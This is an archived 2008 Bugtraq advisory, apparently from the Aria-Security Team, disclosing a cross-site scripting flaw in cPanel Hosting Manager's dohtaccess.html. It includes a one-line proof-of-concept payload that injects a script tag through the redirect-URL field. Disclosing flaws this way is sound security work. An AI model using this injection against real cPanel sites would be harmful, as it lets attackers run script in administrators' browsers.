cPanel Hosting Manager (dohtaccess.html)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: cPanel Hosting Manager (dohtaccess.html)
From: no-reply@xxxxxxxxxxxxxxxxx
Date: 16 Jan 2008 04:09:29 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Aria-Security Team
http://Aria-Security.Net
-----------------------------------
Vendor: http://cPanel.com
cPanel Hosting Manager (dohtaccess.html) Cross-Site SCripting
Vulnerable File: /cpanelpro/dohtaccess.html
Use the information Below:
Url to redirect leech users to: "><script>alert('Discovered By 
Aria-Security')</script>

Regards
The-0utl4w

Credits goeas to Aria-Security Team

---------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1238

Prev by Date: [SECURITY] [DSA 1464-1] New syslog-ng packages fix denial of service
Next by Date: rPSA-2008-0016-1 postgresql postgresql-server
Previous by thread: [SECURITY] [DSA 1464-1] New syslog-ng packages fix denial of service
Next by thread: rPSA-2008-0016-1 postgresql postgresql-server
Index(es):
- Date
- Thread